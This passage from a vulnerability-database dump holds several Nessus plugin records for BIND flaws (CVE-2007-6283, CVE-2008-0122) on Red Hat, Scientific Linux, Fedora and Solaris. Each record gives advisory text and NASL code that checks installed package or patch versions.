(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-devel-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libbind-devel-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libs-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:43:56", "description": "It was discovered 
that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n - when using an LDAP backend, missing function\n declarations caused segmentation faults, due to stripped\n pointers on machines where pointers are longer than\n integers.\n\n - starting named may have resulted in named crashing, due\n to a race condition during D-BUS connection\n initialization. This has been resolved in these updated\n packages.\n\n - the named init script returned incorrect error codes,\n causing the 'status' command to return an incorrect\n status. In these updated packages, the named init script\n is Linux Standard Base (LSB) compliant.\n\n - in these updated packages, the 'rndc [command] [zone]'\n command, where [command] is an rndc command, and [zone]\n is the specified zone, will find the [zone] if the zone\n is unique to all views.\n\n - the default named log rotation script did not work\n correctly when using the bind-chroot package. In these\n updated packages, installing bind-chroot creates the\n symbolic link '/var/log/named.log', which points to\n '/var/named/chroot/var/log/named.log', which resolves\n this issue.\n\n - a previous bind update incorrectly changed the\n permissions on the '/etc/openldap/schema/dnszone.schema'\n file to mode 640, instead of mode 644, which resulted in\n OpenLDAP not being able to start. 
In these updated\n packages, the permissions are correctly set to mode 644.\n\n - the 'checkconfig' parameter was missing in the named\n usage report. For example, running the 'service named'\n command did not return 'checkconfig' in the list of\n available options.\n\n - due to a bug in the named init script not handling the\n rndc return value correctly, the 'service named stop'\n and 'service named restart' commands failed on certain\n systems.\n\n - the bind-chroot spec file printed errors when running\n the '%pre' and '%post' sections. Errors such as the\n following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n - installing the bind-chroot package creates a\n '/dev/random' file in the chroot environment; however,\n the '/dev/random' file had an incorrect SELinux label.\n Starting named resulted in an 'avc: denied { getattr }\n for pid=[pid] comm='named' path='/dev/random'' error\n being logged. The '/dev/random' file has the correct\n SELinux label in these updated packages.\n\n - in certain situations, running the 'bind +trace' command\n resulted in random segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n - support has been added for GSS-TSIG (RFC 3645).\n\n - the 'named.root' file has been updated to reflect the\n new address for L.ROOT-SERVERS.NET.\n\n - updates BIND to the latest 9.3 maintenance release.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : bind on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080521_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific 
Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60402);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n - when using an LDAP backend, missing function\n declarations caused segmentation faults, due to stripped\n pointers on machines where pointers are longer than\n integers.\n\n - starting named may have resulted in named crashing, due\n to a race condition during D-BUS connection\n initialization. This has been resolved in these updated\n packages.\n\n - the named init script returned incorrect error codes,\n causing the 'status' command to return an incorrect\n status. 
In these updated packages, the named init script\n is Linux Standard Base (LSB) compliant.\n\n - in these updated packages, the 'rndc [command] [zone]'\n command, where [command] is an rndc command, and [zone]\n is the specified zone, will find the [zone] if the zone\n is unique to all views.\n\n - the default named log rotation script did not work\n correctly when using the bind-chroot package. In these\n updated packages, installing bind-chroot creates the\n symbolic link '/var/log/named.log', which points to\n '/var/named/chroot/var/log/named.log', which resolves\n this issue.\n\n - a previous bind update incorrectly changed the\n permissions on the '/etc/openldap/schema/dnszone.schema'\n file to mode 640, instead of mode 644, which resulted in\n OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n\n - the 'checkconfig' parameter was missing in the named\n usage report. For example, running the 'service named'\n command did not return 'checkconfig' in the list of\n available options.\n\n - due to a bug in the named init script not handling the\n rndc return value correctly, the 'service named stop'\n and 'service named restart' commands failed on certain\n systems.\n\n - the bind-chroot spec file printed errors when running\n the '%pre' and '%post' sections. Errors such as the\n following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n - installing the bind-chroot package creates a\n '/dev/random' file in the chroot environment; however,\n the '/dev/random' file had an incorrect SELinux label.\n Starting named resulted in an 'avc: denied { getattr }\n for pid=[pid] comm='named' path='/dev/random'' error\n being logged. 
The '/dev/random' file has the correct\n SELinux label in these updated packages.\n\n - in certain situations, running the 'bind +trace' command\n resulted in random segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n - support has been added for GSS-TSIG (RFC 3645).\n\n - the 'named.root' file has been updated to reflect the\n new address for L.ROOT-SERVERS.NET.\n\n - updates BIND to the latest 9.3 maintenance release.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0805&L=scientific-linux-errata&T=0&P=1821\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b2d3a59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:13", "description": " - fixed address of L.ROOT-SERVERS.NET (#411141)\n\n - CVE-2007-6283\n\nNote that Tenable Network Security has extracted 
the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-12-24T00:00:00", "title": "Fedora 7 : bind-9.4.2-2.fc7 (2007-4658)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "modified": "2007-12-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:bind", "p-cpe:/a:fedoraproject:fedora:caching-nameserver", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2007-4658.NASL", "href": "https://www.tenable.com/plugins/nessus/29764", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-4658.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29764);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\");\n script_xref(name:\"FEDORA\", value:\"2007-4658\");\n\n script_name(english:\"Fedora 7 : bind-9.4.2-2.fc7 (2007-4658)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fixed address of L.ROOT-SERVERS.NET (#411141)\n\n - CVE-2007-6283\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=411141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=423061\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-December/006133.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af9e71d5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"bind-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-chroot-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-debuginfo-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-devel-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-libs-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-sdb-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-utils-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"caching-nameserver-9.4.2-2.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:13", "description": " - bind-chroot-admin called restorecon on /proc filesystem\n (#405281)\n\n - 9.5.0b1 release (#405281, #392491)\n\n - stop with initscript will fail if rndc was disabled\n (#417431)\n\n - fixed IDN support in dig and host utilities (#412241)\n\n - added dst/gssapi.h to -devel subpackage (#419091)\n\n - CVE-2007-6283 - /etc/rndc.key file had insecure\n permissions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-12-24T00:00:00", "title": "Fedora 8 : bind-9.5.0-20.b1.fc8 (2007-4655)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "modified": "2007-12-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2007-4655.NASL", "href": "https://www.tenable.com/plugins/nessus/29763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-4655.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29763);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\");\n script_xref(name:\"FEDORA\", 
value:\"2007-4655\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-20.b1.fc8 (2007-4655)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - bind-chroot-admin called restorecon on /proc filesystem\n (#405281)\n\n - 9.5.0b1 release (#405281, #392491)\n\n - stop with initscript will fail if rndc was disabled\n (#417431)\n\n - fixed IDN support in dig and host utilities (#412241)\n\n - added dst/gssapi.h to -devel subpackage (#419091)\n\n - CVE-2007-6283 - /etc/rndc.key file had insecure\n permissions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=392491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=405281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=412241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=417431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=419091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=419421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=423071\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-December/006049.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66d8b03\"\n );\n 
script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 
\"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-chroot-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-debuginfo-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-devel-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-libs-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-sdb-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-utils-9.5.0-20.b1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:01:27", "description": "SunOS 5.8_x86: libresolv.so.2, in.named an.\nDate this patch was last updated by Sun : Mar/09/09", "edition": 23, "published": "2004-07-12T00:00:00", "title": "Solaris 8 (x86) : 109327-24", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-2930", "CVE-2009-0696", "CVE-2008-4194"], "modified": "2004-07-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_109327.NASL", "href": "https://www.tenable.com/plugins/nessus/13429", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13429);\n script_version(\"1.52\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2930\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2008-4194\", \"CVE-2009-0696\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Solaris 8 (x86) : 109327-24\");\n script_summary(english:\"Check for patch 109327-24\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109327-24\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: libresolv.so.2, in.named an.\nDate this patch was last updated by Sun : Mar/09/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/109327-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", 